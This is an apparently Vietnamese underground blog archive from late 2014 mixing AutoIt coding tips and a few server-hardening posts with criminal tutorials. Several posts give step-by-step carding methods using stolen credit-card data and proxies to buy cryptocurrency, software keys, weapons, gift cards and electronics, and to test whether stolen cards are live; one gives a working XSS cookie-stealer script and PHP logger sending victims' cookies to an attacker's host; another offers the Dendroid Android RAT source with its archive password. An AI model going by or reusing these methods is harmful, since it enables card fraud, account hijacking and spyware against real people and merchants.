Thứ Tư, 31 tháng 12, 2014

[Warning - SQL Injection] GiongHatViet.Vn - Giọng Hát Việt


Special Thanks: Troller Hacking Team

Thuộc tính ngôn ngữ tiếng Việt trong AutoIt

Thuộc tính ngôn ngữ trong AutoIt
Thuộc tính ngôn ngữ trong AutoIt
Đây là một mẹo nhỏ trong lập trình AutoIt, mình chỉ chia sẻ trên Facebook. Hôm nay viết lại trên blog để sau này dễ tìm, và cũng dành cho những bạn chưa biết.

Mặc định thì thuộc tính Language sẽ là English - mã ngôn ngữ là 2057.

Tuy nhiên nếu bạn đang viết một ứng dụng với ngôn ngữ tiếng Việt và muốn phần thuộc tính Language hiển thị là Vietnamese như trong hình thì chỉ việc thêm dòng sau vào đầu mã nguồn (trong phần Wrapper Region):
‪#‎AutoIt3Wrapper_Res_Language‬=1066

Thứ Ba, 30 tháng 12, 2014

[TUT UG] Cashout CCN - CCV => Dogecoin

Nguyên liệu : Socks pri, cc master visa pass vbv 3ds

Victim : http://cointellect.com

Reg xong acc verify mail rồi vào

https://cointellect.com/contract/purchase/ mua con demo hoặc con thứ 2


Vài kinh nghiệm từ đa số forum ug khác :

+ Mình thường dùng bin master pass VBV inter EU rất dễ qua.

+ Site này check max mind rất kinh. Mình thường dùng VPS amazon mới ped dc. Cùng 1 con ccv mà socks,vpn,ssh các kiểu ko qua. VPS amazon thì qua. VPS thì qua mấy trang mmo mua nhé. 1 acc mấy đồng tạo VPS order xong xóa tạo con khác mua tiếp

+ CCV mà ped 1 order thì tạo acc khác dùng con ccv đó phang tiếp vì 1 ngày nó cho buy 1 contract thôi

+ Có tiền thì rút hàng ngày nhé. Nó refund del acc thì tiếc,cứ rút tiền tươi cho chắc ăn

Trade DOGECoin -> BitCoin https://www.cryptsy.com/

Poof :



UGA

Thứ Sáu, 26 tháng 12, 2014

Sử dụng Iptables chống Syn Flood attacks và cấm IP

Syn flood là 1 dạng tấn công từ chối dịch vụ, kẻ tấn công gửi các gói tin kết nối SYN đến hệ thống. Đây là 1 loại tấn công rất phổ biến. Loại tấn công này sẽ nguy hiểm nếu hệ thống cấp phát tài nguyên ngay sau khi nhận gói tin SYN từ kẻ tấn công và trước khi nhận gói ACK.
Nếu việc thiết lập kết nối chưa hòan tất 3 bước đây đủ (gọi là half-open connection) mà buộc hệ thống server phải cấp tài nguyên để quản lý thì kẻ tấn công có thể lấy hết tài nguyên của hệ thống server bằng các “flooding” vào server với các gói tin SYN. Syn flood là 1 dạng tấn công phổ biến và nó có thể được ngăn chặn bằng đoạn lệnh iptables sau:

iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j RETURN

Tất cả các kết nối đến hệ thống chỉ được phép theo các thông số giới hạn sau:
limit 1/s: Tốc độ truyền gói tin trung bình tối đa 1/s (giây)
limit-burst 3: Số lượng gói tin khởi tạo tối đa được phép là 3
Dùng iptables, thêm rule sau vào:

# Limit the number of incoming tcp connections
# Interface 0 incoming syn-flood protection
iptables -N syn_flood
iptables -A INPUT -p tcp –syn -j syn_flood
iptables -A syn_flood -m limit –limit 1/s –limit-burst 3 -j RETURN
iptables -A syn_flood -j DROP

iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP –sport 513:65535 –dport 22 -m state –state NEW,ESTABLISHED -m recent –set -j ACCEPT iptables -I INPUT -p tcp –dport 22 -m state –state NEW -m recent –update –seconds 600 –hitcount 11 -j DROP
iptables -A OUTPUT -p tcp -s $SERVER_IP -d 0/0 –sport 22 –dport 513:65

#!/bin/bash
IPT=/sbin/iptables
SPAMLIST=”spamlist”
SPAMDROPMSG=”SPAM LIST DROP”
BADIPS=$(egrep -v -E “^#|^$” /root/iptables/blocked.ips)
# create a new iptables list
$IPT -N $SPAMLIST
for ipblock in $BADIPS
do
$IPT -A $SPAMLIST -s $ipblock -j LOG –log-prefix “$SPAMDROPMSG”
$IPT -A $SPAMLIST -s $ipblock -j DROP
done
$IPT -I INPUT -j $SPAMLIST
$IPT -I OUTPUT -j $SPAMLIST
$IPT -I FORWARD -j $SPAMLIST

#!/bin/bash
# Ban quyen thuoc ve Hanh_bk
/etc/init.d/iptables start
cd /root/iptables
netstat -atun | grep SYN_RECV | awk ‘{print $5}’ | cut -d: -f1 |sort | uniq -d | sort -n > blocked.ips
sh ./iptables.sh
VHBGroup

Kỹ thuật IFrame Injection Attacks

Kỹ thuật tấn công theo kiểu IFrame Injection hiện vẫn đang là 1 dạng xâm nhập cơ bản và phổ biến nhất của mô hình Cross-Site Scripting – XSS . Bằng cách chèn vào các website động

(ASP, PHP, CGI, JSP … ) những thẻ HTML hay những đoạn mã script nguy hiểm, trong đó những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML cơ bản. Nếu bạn phát hiện được có kẻ đang nhắm vào website của bạn bằng kỹ thuật này, không nên quá lo lắng. Sau đây là 1 số thao tác cần làm khi website lâm vào tình trạng này.
Ví dụ 1 đoạn mã độc hại thường được sử dụng để tấn công:

{xtypo_code}

nội dung của đoạn mã độc
{/xtypo_code}

1. Thường xuyên bảo trì website trong 1 khoảng thời gian nhất định:
Các chuyên gia bảo mật khuyến cáo những người quản trị nên gỡ bỏ toàn bộ website xuống để tránh trường hợp trở thành tâm điểm phát tán mã độc. Và trong toàn bộ quá trình khắc phục, tiếp tục giữ tình trạng offline của website.

2. Thay đổi lại tất cả các mật khẩu:Thoạt nghe có vẻ đơn giản, nhưng rất nhiều người quản trị hình như không mấy để ý đến khâu cực kỳ quan trọng này. Sau khi bị tin tặc nhòm ngó, bạn nên đổi mới tất cả mật khẩu bao gồm tài khoản ftp, ssh, các tài khoản quản trị, cơ sở dữ liệu …

3. Lưu lại 1 bản của website để phân tích:Để xác định rõ nguyên nhân và điểm yếu nào đã bị tin tặc khai thác, bạn cần lưu giữ lại 1 bản nguyên tình trạng lúc bị tấn công. Điều này rất có ích cho việc phân tích và ngăn chặn hiểm họa sau này, bạn nên lưu lại website dưới dạng file nén định dạng rar, zip hoặc gzip và lưu trữ tại 1 nơi an toàn. Lưu ý rằng không bao giờ được lưu file cách ly này trực tiếp trên server.

4. Thay thế toàn bộ website bằng 1 bản sao lưu hoàn toàn sạch sẽ: Không nên quá dựa vào những nhà cung cấp dịch vụ host rằng họ sẽ sao lưu toàn bộ dữ liệu cho bạn. Rất nhiều bộ phận hỗ trợ kỹ thuật thường xuyên khẳng định rằng họ có tiến hánh sao lưu tự động theo lịch trình, nhưng không gì có thể chắc chắn bằng việc bạn tự làm, hơn nữa 2 phương án dự phòng bao giờ cũng tốt hơn 1 phương án.

5. Kiểm tra lại website và đăng tải trở lại: Quá trình này nên tiến hành chu đáo để đảm bảo rằng toàn bộ website an toàn và không còn lỗi nữa, sau đó bạn có thể đăng tải website trở lại như trước.

6. Tìm hiểu về nguồn gốc của các cuộc tấn công: Để đảm bảo rằng những cuộc tấn công sẽ không bao giờ lặp lại, những người quản trị nên tiến hành 1 cuộc kiểm tra, phân tích đầy đủ và chi tiết của cuộc tấn công đó. Do lỗi ở đâu ? Lỗ hổng an ninh hay ứng dụng web ? Hoặc do chế độ phân quyền bị sai lệnh, nhầm lẫn ? Có thể website bị nhiêm virus trực tiếp ngay từ server lưu trữ dữ liệu ? Tất cả đều phải được tìm hiểu và phân tích kỹ lưỡng. Nếu cần thiết, hãy nhờ đến chuyên gia an ninh của các hãng bảo mật hàng đầu thế giới như Kaspersky, BitDefender, Norton, Panda, Avira …

7. Áp dụng các biện pháp bảo mật phù hợp: Mặc dù bạn đã khôi phục thành công website, nhưng không có gì đảm bảo chắc chắn rằng website của bạn sẽ không bị tấn công thêm lần nào nữa. Nếu lỗ hổng an ninh cũ chưa được khắc phục, có thể website của bạn lại bị tê liệt ngay trong tối nay. Dựa vào các kết quả phân tích thu được ở bước trên, bạn nên áp dụng các biện pháp an ninh phù hợp, nâng cấp server, cài đặt thêm chương trình bảo mật, nâng cấp toàn bộ ứng dụng web hoặc tiến hành sử dụng quy luật bảo mật hoàn toàn mới.

Dựa vào kinh nghiệm quản lý và thông tin thu thập, chúng tôi có thể đóng góp thêm 1 số lời khuyên và dự đoán khách quan về nguyên nhân như sau.

Các nguyên nhân dễ gặp phải:
- Website sử dụng dịch vụ host giá rẻ
- Dựa trên nền tảng phiên bản cũ của các ứng dụng mã nguồn mở, ví dụ như WordPress 1.0… vốn có khá nhiều lỗ hổng
- Quyền truy cập dữ liệu trên server được thiết lập không theo thứ tự nhất định, ví dụ quyền thao tác với dữ liệu ở mức 777 – đọc, ghi và thực thi
- Các thiếu sót của phần mềm ứng dụng
- Sử dụng FTP thay vì SFTP
- Không hạn chế IP đối với các tài khoản SSH và FTP

Một số thao tác đơn giản nhưng hữu ích:
- Thay đổi mật khẩu định kỳ, ví dụ 2 tuần hoặc 4 tuần 1 lần
- Luôn cập nhật các phiên bản ổn định của ứng dụng
- Thường xuyên “dọn dẹp” các thư mục chứa dữ liệu trên server, để ý nếu có những file lạ đột nhiên xuất hiện
- Các mức phân quyền được thiết lập chuẩn xác
- Thường xuyên trao đổi với các đơn vị, chuyên gia cung cấp dịch vụ bảo mật để nhận được lời khuyên tốt nhất.

Thứ Ba, 23 tháng 12, 2014

Sử dụng Resource trong AutoIt

Resource trong AutoIt
Sử dụng Resouce trong AutoIt
Khi muốn viết một ứng dụng mà có chứa các hình ảnh và icon thì giải pháp mà mình thường thấy đó là các bạn sẽ sử dụng hàm FileInstall để đóng gói và cài đặt các tập tin. Trong video hướng dẫn lập trình AutoIt lần này, mình sẽ hướng dẫn các bạn sử dụng Resource trong AutoIt.


ĐỌC TIẾP »

Thứ Năm, 18 tháng 12, 2014

[TUT UG] Reg Key KIS & KAV 2015



Victim : http://www.kaspersky.com/internet-security

Mọi người nhìn cái link thì lại bảo có gì là đâu nhưng nó có quan trọng đấy tránh cái link dười này ra nhé : http://usa.kaspersky.com/products-services/home-computer-security/internet-security/?domain=kaspersky.com refund ráng chịu
ok vào vấn đề luôn chuẩn bị:

CVV xịn pass vbv, mcsc ( VISA, Amex,master )
sock trùng state
clear sạch máy trước khi chiến
Mail dùng mail domain hoặc mail AOL
tớ chơi aol fake name mail giống tên chủ thẻ cho chắc ăn, nếu đăng ký mail đã có thì thêm mấy cái giống ngày tháng năm sinh vào vào sau name nhé. vào link trên để phang thôi khi add oder thì bỏ cái Order a Backup Disk đi chỉ cần lấy key thôi mà. oder thì nhớ điền ccv và name,add bằng tay chứ ko chơi kiểu copy paste cho chắc nhé. bin thì cũng tuỳ bin cũng chẳng chú ý làm hên xui do ăn ở

VZ

Thứ Tư, 17 tháng 12, 2014

[AutoIt] Truy vấn HTTP cơ bản - đăng nhập trang web

AutoIt - HTTP Request
AutoIt - HTTP Request
Làm việc với các truy vấn HTTP là một trong những chủ đề khá rắc rối trong lập trình AutoIt. Có nhiều cách thức làm việc khác nhau như sử dụng thư viện IE, WinHttp, cURL hay Win Http Object. Trong bài viết này, mình xin chia sẻ với các bạn Win Http Object UDF giúp bạn dễ dàng gửi truy vấn HTTP với phương thức GET, POST cực kỳ đơn giản.


ĐỌC TIẾP »

Thứ Hai, 15 tháng 12, 2014

[TUT UG] Súng, Đạn, Dao Găm các kiểu con đà điểu


NGUYÊN LIỆU :CCV NON INFO ĐỐI VỚI INTER
BILL TRUE ĐỐI VS US GATE CHECK AVS
SOCKS : US TRÙNG VS BANG

-> TA TIẾN HÀNH B=S ĐỐI VS INTER
----> VÀ B#S VS US CHỌN KHẨU NÀO THÍCH THÌ NHÍT  
ORDER TẦM GIỜ BAN NGÀY US ( 7-9 TỐI vn )
SÁNG RA CÓ MAIL BÁO SHIPPED



VietZilla

Thứ Sáu, 12 tháng 12, 2014

Facebook Comment Manager - Ứng dụng quản lý bình luận

Facebook Comment Manager
Facebook Comment Manager

ỨNG DỤNG QUẢN LÝ BÌNH LUẬN CHO FAN PAGE

Facebook Comment Manager là ứng dụng giúp Admin Fan Page quản lý sự kiện một cách dễ dàng, ví dụ điển hình như Event của Page Siêu Rẻ, tìm thành viên nhiều lượt thích nhất hoặc đăng sớm nhất,...

Ứng dụng có thể hoạt động mà tài khoản hiện tại của bạn không cần đăng nhập Facebook, không cần sử dụng thẻ truy cập. Tuy nhiên đối với trạng thái không công khai thì bạn cần cung cấp thẻ truy cập để ứng dụng có thể lấy dữ liệu.


ĐỌC TIẾP »

Thứ Ba, 9 tháng 12, 2014

Anonymous Malaysia tấn công một loạt website Việt Nam

Nhóm hacker tự xưng Anonymous Malaysia đã lên tiếng nhận trách nhiệm tấn công một loạt website có tên miền .vn, để lại thông điệp "Hacked by Anonymous Malaysia. Enjoy being down".Nhóm hacker Anonymous Malaysia cũng công bố "thành tích" trên fanpage Facebook của mình.


Trên trang fanpage cách đây 5 giờ đồng hồ, Anonymous Malaysia tuyên bố khoảng 50 trang web quan trọng của Việt Nam đã bị Anonymous Malaysia tấn công và "đây mới chỉ là bắt đầu", "chúng tôi sẽ tiếp tục thực hiện một đợt tấn công khổng lồ nữa".

Anonymous Malaysia công bố "thành tích"

Cá link này đúng là những website có tên miền .vn mà nhóm Anonymous Malaysia liệt kê đã bị tấn công thay đổi giao diện (deface), trang chủ của các website này chỉ để lại những dòng chữ tiếng Anh, tạm dịch: "Anonymous Malaysia đã ở đây. Chúng tôi không phải là cầu thủ bóng đá. Chiến đi". Nhóm này cũng để lại địa chỉ link fanpage của mình.

Trong số danh sách các website "quan trọng" bị hack, chúng tôi thấy đa số là các website nhỏ bán rượu, áo cưới, website có tên miền giáo dục .edu.vn và một website tên miền chính phủ .gov.vn (Sở Xây dựng Bình Dương). Trong số các website bị deface, có Công ty VNPT Technology, Đại học Đại Nam, Công ty Cổ phần phần mềm Kế toán Doanh nghiệp Việt Nam, Trung tâm ngoại ngữ Á-Mỹ... Các website này chỉ bị thay đổi trang chủ, các trang con vẫn truy cập bình thường.

Nhóm hacker đã tấn công các website .vn, để lại thông điệp: "Đừng lo, chúng tôi chỉ tải lên index deface".

Như vậy, cuộc đối đầu trên sân cỏ giữa các tuyển thủ quốc gia Việt Nam và Malaysia đã tràn lên mạng. Ngay sau trận bán kết lượt đi trên sân Malaysia với kết quả đội tuyển Malaysia phơi áo 1-2 trước đội tuyển Việt Nam, trang web của Liên đoàn Bóng đá Malaysia đã bị tấn công deface. Tiếp theo, trang web của Liên đoàn Bóng đá Việt Nam VFF cũng bị tấn công DDoS và hiện đã được khắc phục. Và xem ra, các hacker Malaysia chưa chịu dừng lại. Ngay trước ngày diễn ra trận lượt về trên sân Mỹ Đình 11/12 (ngày mai), nhóm hacker tự xưng Anonymous Malaysia đã tấn công thay đổi giao diện một loạt website Việt Nam.

Câu hỏi đặt ra lúc này là tại sao các website lại dễ dàng bị hack như vậy? Các website Việt Nam nói chung cần làm gì để tránh khỏi những đợt tấn công? Và cuộc "chiến tranh mạng" này sẽ đi đến đâu? 

VNReview

Danh Sách Các Website Bị Attack Trong Giờ Vừa Qua
http://soxd.binhduong.gov.vn/
http://www.cic.edu.vn/
http://www.online.edu.vn/
http://www.zonemedia.edu.vn/
http://dainam.edu.vn/
http://amyschool.edu.vn/
http://daotaolaptrinh.edu.vn/
http://edufac.edu.vn/
www.cus.vnu.edu.vn
www.cea.vnu.edu.vn
www.fit.uet.vnu.edu.vn
http://iti.vnu.edu.vn/
http://qlcv.yds.edu.vn/
http://khtc.uit.edu.vn/
http://office.easvietnam.edu.vn/
http://mtb.vimaru.edu.vn/
http://kinhteluatvcu.edu.vn/
http://institution.eduk.vn/
http://exhibition.eduk.vn/
http://nhatkybe.vn/
http://www.vasj.com.vn/
http://chinashippingvietnam.vn/
http://sachdaiviet.com.vn/
http://maygotaman.com.vn/
http://capnuocphutho.vn/
http://develop.com.vn/
http://pearltrans.com.vn/
http://bacvietnam.com/
http://vnpt-technology.vn/
http://www.navisystem.vn/
http://nkb.vn/
http://getweb.vn/
http://betonamu.vn/
http://aocuoivansang.vn/
http://www.aivi.vn/
http://ruoumauson.vn/
http://giaiphong.vn/
http://inaoanime.vn/
http://swisslanguagecentre.vn/
http://www.bighotel.vn/
http://bigland.vn/
http://biggroup.vn/index.html
http://bigsuccess.vn/
http://www.echovietnam.vn/
http://isave.com.vn/
http://thuenhanhanh.vn/
http://vophinhathuy.com/
http://xnice.vn/
http://phongdep.vn/
http://hcm.phongdep.vn/
http://hue.phongdep.vn/
http://traudat.vn/ad/
http://phongkhamnhatviet.vn/

[TUT UG] Phụ Kiện Apple, Headphone, Camera, Projector, vv...

Mình dùng mail yahoo, socks từa lưa, ccv vis đủ blance.

Bill # Ship = Drop



UGA

[TUT UG] Accessories iPhone, iPad, iPod and MacBook

Không biết ae biết chưa tại thấy cũng đc nên share cho ae!
victim: http://www.powersupportintl.com/
-- CCV đủ bl
-- Socks US
-- Mail gì cũng được! nhưng gmail cho nhanh
-- Time lúc nào rảnh thì bem

Em không đâm hàng trực tiếp mà đâm một egift sao đó tạo acc info vn lấy egift thanh toán



UGA

Check cc live + Balance chuẩn !

Với mình thì nó là chuẩn 99.9%
Nó cũng là check avs nên ae k sợ kill cc.
Định giữ để khi nào cần mới bỏ ra check nhưng unclock có bão cc nên mình viết tut cho ae check cc luôn.

-- Vào việc :

- Site : http://runnersstop.com
- Chọn số tiền mình cần check
- Order như bt
- Info linh tinh beng


- Cứ continue nhé..
- Đến phần điền cc : Name On Card điền linh tinh
Chỉ điền đúng cc num + date + ccv
- Sau khi submit nó sẽ hiện thế này :



Thấy nó thank you thì đừng sợ nhé. Cứ google translate nó khác hiểu
Cái này nó bắt phải mail cho nó thì order mới thành công nên ae đừng lo

* Chú ý : 2 chỗ khoanh màu đỏ :
Khoanh 1 : Nếu báo như trong ảnh là cc die hoặc k đủ balance.
Còn báo Mismatch Avs gì gì đó dài dài là Ok nhé !
Khoanh 2 : Check xong nếu muốn check cc khác thì ấn vào chữ Click here ở đó vào thay con cc khác vào.
Check khi nào mỏi tay thì thôi
Nếu ai check mà tự nhiên thấy site lỗi thì fake socks vào lại chiến tiếp


UGA

[TUT UG] Egift Starbuck = CCN

Ng.liệu: socks trùng cc, CCN
https://www.starbucks.com/shop/card/egift
Chọn gift 10$ ( mới test 10$ nên ko biết cao hơn có đc ko ) ghi tên người nhận messenger ( ghi bậy cũng đc )
Tên người gửi: name cc
Email người nhận: email bạn
Email người gửi: email bạn luôn
Checkout as guest
Điền info cc vào. cvv điền 000 với visa. mấy loại khác tự biên tự diễn
Qua đoạn review order. Bấm purchase.
Bị lỗi Oops, something has gone wrong! ấn Purchase tiếp. Thử lại 1-2 lần mà vẫn ko qua thì cc ko đủ tiền. Làm lại con khác

Proof:


UGA

Thứ Bảy, 6 tháng 12, 2014

[Source Code - Malware] Dendroid


Dạo gần đây, một số nhóm nghiên cứu bảo mật đã phát hiện ra một loại malware mới đó là Dendroid. Dendroid là một biến thể của “Remote Access Toolkit” (RAT) được dùng cho việc theo dõi những mục tiêu ở các nước phương Tây, gần đây, malware này lại bùng nổ ở Ấn Độ với mức độ nguy hiểm được các chuyên gia bảo mật đánh giá cao.

Dendroid được dùng để do thám, quản lý và điều khiển máy mà nó được cài đặt. Bộ công cụ này hiện nay đang được rao bán ở chợ đen các trang web UG với mức giá 300$, một món giá hời cho những ai muốn tự động hóa việc tạo và phân phối phần mềm độc hại trên nền tảng Android vủa Google.

Ảnh: ảnh chụp giao diện điều khiển của Dendroid.

Với những tính năng cao cấp này, Dendroid đã làm chúng tôi nhớ lại những con malware của Nga ngố - những con malware chất lượng cao. Dendroid hiện đang được lập trình viên tạo ra nó rao bán online và chấp nhận thanh toán bằng nhiều đơn vị tiền tệ khác nhau như US Dolla , Bitcoin, LiteCoin và cả PayPal (nếu người bán tin tưởng bạn).... kèm theo đó là một chính sách bảo hành với lời hứa " con malware của bạn sẽ không bị phát hiện".

Vậy làm sao virus của chúng ta có thể tránh khỏi bị phát hiện và malware có thể được lên kho Google Play ?
Câu trả lời là con malware này cũng sẽ giúp bạn làm luôn việc đó cùng với sự trợ giúp kĩ thuật từ phần lớn cộng đồng UG của Nga ngố và loại này cũng rất hiếm khi xuất hiện ở các nước châu Mĩ hay US.

Nhìn chung biến thể malware này đã được thiết kế để tránh khỏi sự phát hiện của hệ thống bảo vệ của Google Play bằng cách sử dụng phương pháp "Anti-Emulation detection"* để tránh khỏi sự theo dõi và phân tích của các chương trình diệt virus hay hệ thống phòng chống malware của Google.

Và đây là một số tính năng của một gói malware trị giá 300$ của nhà phát triển:
- cho ngăn chặn SMS được nhận bởi thiết bị victim.
- cho phép tải xuống hình ảnh từ máy mục tiêu.
- theo dõi mục tiêu bằng cách ra lệnh chụp ảnh sử dụng camera trước / sau của máy mục tiêu.
- cho phép download lịch sử duyệt web và bất kì bookmark nào về máy hacker.
- cho phép download bất kì tài khoản nào được lưu trữ trên máy mục tiêu (vd: facebook, yahoo, email, vpn...).
- cho phép chuyển tinh nhắn văn bản đến chủ thiết bị.
- cho phép ghi âm và nghe lén cuộc gọi từ xa.
- cho phép tạo một hộp thoại yêu cầu password và gửi tin nặc danh (có thể là tin tống tiền từ hacker).


Password: jokeranondarkknight.blogspot.com

*yêu cầu bạn phải có Android Development Toolkit có thể xem ở đây

*Anti-Emulation detection : đây là một công nghệ phát hiện các mẫu virus mới chưa có trong danh sách nhận diện của các chương trình diệt virus. nó hoạt động theo cơ chế cách ly các app mới cài vào máy vào trong một môi trường giả lập để theo dõi mọi hoạt động của app đó, nếu có các hoạt động đáng nghi, chương trình diệt virus sẽ lập tức cảnh báo người dùng. ở đây lập trình viên Dendroid đã qua mặt nó bằng cách sử dụng code "sạch" và một phương pháp code khác.

[PHP Script] Facebook Exchange System v1.0

Facebook Exchange System
Facebook Exchange System
Facebook Exchange System là bộ mã nguồn PHP giúp bạn dễ dàng xây dựng một trang web cung cấp dịch vụ Facebook như trao đổi lượt thích (autolike), chia sẻ, bình luận, tăng tương tác cho page Facebook. Dễ dàng cài đặt và sử dụng, giao diện thân thiện và tương thích trên mọi trình duyệt cũng như các thiết bị khác nhau.


ĐỌC TIẾP »

Thứ Hai, 1 tháng 12, 2014

[AutoIt] Hộp thoại thông báo với hiệu ứng trượt

Autoit message dialog
Hộp thoại thông báo với hiệu ứng trượt
Chia sẻ mã nguồn AutoIt tham khảo - tạo hộp thoại thông báo với hiệu ứng trượt (từ dưới lên). Đây là hiệu ứng hiển thị thông báo thường gặp trong các trình diệt virus. Hiệu ứng này được tạo ra bằng cách kết hợp vòng lặp, tọa độ và hàm WinMove. Xem demo và tải mã nguồn tham khảo ở dưới nhé!


ĐỌC TIẾP »

Khắc phục tình trạng chuyển hướng liên kết Facebook bị lỗi

chuyển hướng liên kết Facebook bị lỗi
Chuyển hướng liên kết Facebook bị lỗi

Mấy hôm nay thấy các liên kết trên Facebook dẫn ra ngoài đều không thể truy cập được do liên kết chuyển hướng (redirector) của Facebook bị báo lỗi "Trang web này hiện không có" như hình trên.

Do thấy nhiều bạn cũng bị như mình (http://on.fb.me/1yamAJi), nên mình dự tính viết một phần mở rộng (extension) cho Chrome và Firefox. Tuy nhiên vì trình duyệt không nạp extension trong một trang web không thể truy cập do đó extension không thể hoạt động được. Vậy nên mình sẽ chia sẻ cho các bạn một bookmarklet giúp chuyển hướng tới liên kết đích chỉ với 1 click - để dùng trong trường hợp Facebook không thể chuyển hướng.


ĐỌC TIẾP »

Thứ Ba, 25 tháng 11, 2014

Khắc phục lỗi vỡ khung trên trình duyệt Chrome

Google Chrome
Khắc phục lỗi vỡ khung trên trình duyệt Chrome

Sau khi cập nhật trình duyệt Chrome lên phiên bản 39.0, chắc hẳn nhiều bạn sẽ nhận ra một số trang web hiển thị "không bình thường" như mọi khi. Đây không phải là do các trang web bị lỗi mà do một số thay đổi nhỏ trong phiên bản mới của Chrome.

ĐỌC TIẾP »

Tại sao AutoIt luôn bị “ghét”?

autoit
Tại sao AutoIt luôn bị “ghét”?
"Ghét" ở đây không hẳn là mọi người ghét mà là mình muốn nói tới việc các trình diệt vi-rút "ghét" AutoIt. Tại sao vậy?

Nếu bạn nào chưa biết thì AutoIt là một ngôn ngữ kịch bản (Scripting Language) được viết trên nền C++. Là một người yêu thích ngôn ngữ AutoIt và với kinh nghiệm 2 năm viết những ứng dụng bằng ngôn ngữ AutoIt, mình sẽ viết bài này theo quan điểm cá nhân. Mình thì biết một số ngôn ngữ lập trình và ngôn ngữ kịch bản bao gồm PHP, JS, VB.Net, C#, Python và AutoIt. Trong đó thì mình có khả năng tốt nhất ở 3 ngôn ngữ là PHP/JS/AutoIt (tốt là do mình thường xuyên sử dụng).


ĐỌC TIẾP »

Chủ Nhật, 23 tháng 11, 2014

Tạo Một Cookieloger Để Lấy Trộm Cookie Đơn Giản


Lấy trộm Cookie để làm gì? để đăng nhập ngoài sự cho phép của họ rồi làm gì là việc của bạn chẳng hạn hack acc facebook,yahoo,....

Đầu tiên mở notepad cho vào đoạn code sau rồi lưu với 1 tên bất kì..Giả sử là HACKER.gif

<script>location.href='http://www.yoursite.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>

Tiếp tục copy đoạn code sau cho vào notepad và lưu lại với tên cookielogger.php:
<?php$filename = “logfile.txt”; if (isset($_GET["cookie"])) if (!$handle = fopen($filename, ‘a’)) echo “Temporary Server Error,Sorry for the inconvenience.”; exit; else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) {echo “Temporary Server Error,Sorry for the inconvenience.”; exit;  echo “Temporary Server Error,Sorry for the inconvenience.”; fclose($handle); exit; } echo “Temporary Server Error,Sorry for the inconvenience.”; exit; ?> 

Tạo thêm 1 file là logfile.txt rồi vất cả 3 file lên host. Chmod lại file logfile.txt 777 để có quyền ghi lên nó.

cookielogger.php -> http://www.yoursite.com/cookielogger.php logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777) HACKER.gif -> http://www.yoursite.com/HACKER.gif

Rồi đi tìm victim dụ thôi.Ví dụ như chèn đoạn code này vào chữ kí ở forum chẳng hạn.Ngồi chờ tên nào rãnh kích vào và thịt thôi


Config Sever Chống Local hiệu quả

1. Login Vào Root Account.
2. Mở File “php.ini” Trong Pico Editor

<span class="syntaxdefault"></span><span class="syntaxkeyword">[ </span><span class="syntaxdefault">pico </span><span class="syntaxkeyword">/</span><span class="syntaxdefault">usr</span><span class="syntaxkeyword">/</span><span class="syntaxdefault">local</span><span class="syntaxkeyword">/</span><span class="syntaxdefault">lib</span><span class="syntaxkeyword">/</span><span class="syntaxdefault">php</span><span class="syntaxkeyword">.</span><span class="syntaxdefault">ini </span><span class="syntaxkeyword">] </span><span class="syntaxdefault"></span>

3. Find :”Safe_Mode”
4.

<span class="syntaxdefault"></span><span class="syntaxkeyword">[ </span><span class="syntaxdefault">Ctrl </span><span class="syntaxkeyword">+ </span><span class="syntaxdefault">W </span><span class="syntaxkeyword">and </span><span class="syntaxdefault">type </span><span class="syntaxstring">"Safe_Mode" </span><span class="syntaxkeyword">] </span><span class="syntaxdefault"></span>

5. Đổi Off thành On.

<span class="syntaxdefault"></span><span class="syntaxkeyword">[ </span><span class="syntaxstring">"safe_mode = Off" </span><span class="syntaxdefault">to </span><span class="syntaxstring">"safe_mode = On" </span><span class="syntaxkeyword">] </span><span class="syntaxdefault"></span>

6. Find”disabled_functions”
7.
<span class="syntaxdefault"> </span><span class="syntaxkeyword">[ </span><span class="syntaxdefault">Ctrl </span><span class="syntaxkeyword">+ </span><span class="syntaxdefault">W </span><span class="syntaxkeyword">and </span><span class="syntaxdefault">type </span><span class="syntaxstring">"disabled_functions" </span><span class="syntaxkeyword">] </span><span class="syntaxdefault"></span>

8. Thêm Vài Functions ( Dis Hàm ) Cho Nó Khỏi Local :

<span class="syntaxdefault"></span><span class="syntaxkeyword">[</span><span class="syntaxdefault">system</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">exec</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">shell_exec</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">passthru</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">pcntl_exec</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">putenv</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">proc_close</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">proc_get_status</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">proc_nice</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">proc_open</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">proc_terminate</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">popen</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">pclose</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">set_time_limit</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">ini_alter</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">virtual</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">openlog</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">escapeshellcmd</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">escapeshellarg</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">dl</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">curl_exec</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">parse_ini_file</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">show_source</span><span class="syntaxkeyword">] </span><span class="syntaxdefault"></span>

9. Save lại và Retart lại Apache web server

<span class="syntaxdefault"></span><span class="syntaxkeyword">[ /</span><span class="syntaxdefault">etc</span><span class="syntaxkeyword">/</span><span class="syntaxdefault">init</span><span class="syntaxkeyword">.</span><span class="syntaxdefault">d</span><span class="syntaxkeyword">/</span><span class="syntaxdefault">httpd restart </span><span class="syntaxkeyword">] </span><span class="syntaxdefault"></span>

